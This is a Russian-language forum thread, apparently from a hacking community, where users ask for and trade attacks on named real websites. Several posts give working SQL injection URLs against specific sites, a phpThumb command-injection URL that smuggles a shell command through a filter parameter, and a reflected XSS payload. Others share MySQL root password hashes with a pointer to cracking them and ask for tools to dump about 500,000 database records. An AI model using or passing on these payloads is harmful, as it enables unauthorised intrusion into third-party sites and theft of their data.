Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    Короче это угар

    Конечно, но благодаря ошибки и получасется вывод.


    Вот так ты сможешь провдить инъекцию =)

    http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version(),SCHEMA_NAME)+from+information_schema.SCHEMATA+LIMIT+1,2+--+
     
  2. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=http://wwwwwwww/&ws=320&hs=240&f=png

    code inj

    обьясните в кратце как использовать
     
    1 person likes this.
  3. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    http://www.bmaccess.net/webtool/phpThumb/phpThumb.php?src=/home/site.com/public_html/kartinka.jpg&fltr[]=blur|5%20-quality%2075%20-interlace%20line%20%22/home/site.com/public_html/kartinka.jpg%22%20jpeg:%22/home/site.com/public_html/kartinka.jpg%22%20;%20ls%20-la%20;&phpThumbDebug=9
     
    1 person likes this.
  4. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    это может быть уязвимо?
    Microsoft OLE DB Provider for SQL Server error '80040e21'

    Invalid character value for cast specification.

    /view_lesson_plan.asp, line 21
    если по этой ошибке трудно сказать оставлю линк

    и ещё одна
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to int.

    /scammer.asp, line 32
     
    #14544 Koren, 18 Aug 2010
    Last edited: 18 Aug 2010
  5. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    А ошибка то просто валится или ты чё то в параметр пихаешь?
     
  6. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    в параметр asp?id=674 подставляем '
     
  7. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Попробуй логическое выражение.. Ваапще наврено будет скуля но тока этовинда :) там другой синтаксис если что..
     
  8. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    так в том то и дело что пробывал логическое)) ничего не меняется
    а с виндой как быть?)
     
  9. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Ну всмысле там MS SQL. Где то была статья , даже мож и на ачате, про проведение инъекции. Ну гугл точно найдёт :)
     
  10. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    http://clustercenter.org/login.php?return=/index/month/&category=1'
    просто ошибка?
    не крутится скуля такая?
    пробывал у меня не вышло
     
  11. so_newbie

    so_newbie Member

    Joined:
    6 Jul 2010
    Messages:
    33
    Likes Received:
    14
    Reputations:
    9
    Lilo
    в выводе ошибки мускула есть пассивная xss :)
    Code:
    http://clustercenter.org/login.php?return=/index/month/&category=<script>alert("xss")</script>'
    
     
  12. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    _http://clustercenter.org/login.php?return=/index/month/&category=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))+--+
     
    1 person likes this.
  13. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    спасибо парни=) понял
    плюсики кончились только=(
     
  14. php_master

    php_master New Member

    Joined:
    6 Mar 2010
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    Ребята, подскажите чем зашифрованы пароли в базе данных mysql.user если они имеют такой вид:

    root
    *6E8611756F31DE90B29395C382E276861503CB8B

    debian-sys-maint
    *0B749C627EED121EBC71FBFEE656100950D0C2E4
     
  15. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    это MySQL5
     
    1 person likes this.
  16. KNOT

    KNOT Member

    Joined:
    7 Apr 2010
    Messages:
    107
    Likes Received:
    26
    Reputations:
    3
    root
    *6E8611756F31DE90B29395C382E276861503CB8B
    вот в этой теме расшифровка
    расшифровка hash. Part3 (DES, MySQL, SHA-1)
     
    1 person likes this.
  17. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    каким скриптом\прогой лучше сдампить таблицу через sql-inj? записей около 500k
    sipt и toolza на катят
     
  18. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Какая база?
     
  19. katrik

    katrik New Member

    Joined:
    17 Aug 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    подскажите адрес phpmyadmin хостинга logol.ru. Буду очень благодарен. Или же расскажите как узнавать адреса phpmyadmin? может скрипт есть какой то?
     
  20. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    mysql 5.0.68-log
     
Thread Status:
Not open for further replies.